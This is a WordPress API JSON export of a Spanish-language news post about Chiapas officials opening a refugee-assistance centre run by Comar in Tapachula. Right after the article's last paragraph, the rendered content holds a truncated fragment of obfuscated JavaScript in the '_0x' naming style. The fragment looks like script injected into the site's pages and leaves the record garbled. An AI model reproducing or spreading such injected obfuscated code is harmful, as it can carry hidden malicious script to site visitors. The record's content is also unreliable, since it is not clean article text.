{"id":24250,"date":"2025-09-29T04:03:22","date_gmt":"2025-09-29T04:03:22","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24250"},"modified":"2025-09-29T04:03:22","modified_gmt":"2025-09-29T04:03:22","slug":"juan-carlos-moreno-guillen-se-congratula-por-centro-de-ayuda-a-personas-refugiadas-en-la-frontera-sur","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24250","title":{"rendered":"Juan Carlos Moreno Guill\u00e9n se congratula por centro de ayuda a personas refugiadas en la Frontera Sur"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"657\" data-id=\"24251\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355600-1024x657.jpg\" alt=\"\" class=\"wp-image-24251\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355600-1024x657.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355600-300x193.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355600-768x493.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355600.jpg 1120w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"24254\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355613-1024x683.jpg\" alt=\"\" class=\"wp-image-24254\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355613-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355613-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355613-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355613-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355613-2048x1366.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"24253\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355617-1024x683.jpg\" alt=\"\" class=\"wp-image-24253\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355617-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355617-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355617-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355617-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355617-2048x1366.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"755\" data-id=\"24252\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355597-1024x755.jpg\" alt=\"\" class=\"wp-image-24252\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355597-1024x755.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355597-300x221.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355597-768x566.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000355597.jpg 1158w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>28 de septiembre del 2025.Desde Tapachula, el magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, atestigu\u00f3 junto al gobernador Eduardo Ram\u00edrez Aguilar y al subsecretario de Derechos Humanos, Poblaci\u00f3n y Migraci\u00f3n, F\u00e9lix Arturo Medina Padilla, el acto de Inauguraci\u00f3n del Centro Multiservicios de la Comisi\u00f3n Mexicana de Ayuda a Refugiados (Comar).<\/p>\n\n\n\n<p>En este marco, Moreno Guill\u00e9n se congratul\u00f3 por este espacio, resultado del esfuerzo coordinado entre el gobierno federal y estatal, que beneficiar\u00e1 a las personas que se encuentran en un contexto de movilidad humana, brind\u00e1ndoles informaci\u00f3n, orientaci\u00f3n, atenci\u00f3n y la canalizaci\u00f3n a servicios integrales y humanitarios.<\/p>\n\n\n\n<p>Asimismo, refrend\u00f3 el compromiso institucional de impartir una justicia m\u00e1s humanista que garantice y salvaguarde los derechos humanos en la entidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>28 de septiembre del 2025.Desde Tapachula, el magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, atestigu\u00f3 junto al gobernador Eduardo Ram\u00edrez Aguilar y al subsecretario de Derechos Humanos, Poblaci\u00f3n y Migraci\u00f3n, F\u00e9lix Arturo Medina Padilla, el acto de Inauguraci\u00f3n del Centro Multiservicios de la Comisi\u00f3n Mexicana de Ayuda a Refugiados (Comar). En &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24253,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24250","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24250","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24250"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24250\/revisions"}],"predecessor-version":[{"id":24255,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24250\/revisions\/24255"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24253"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24250"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24250"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24250"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}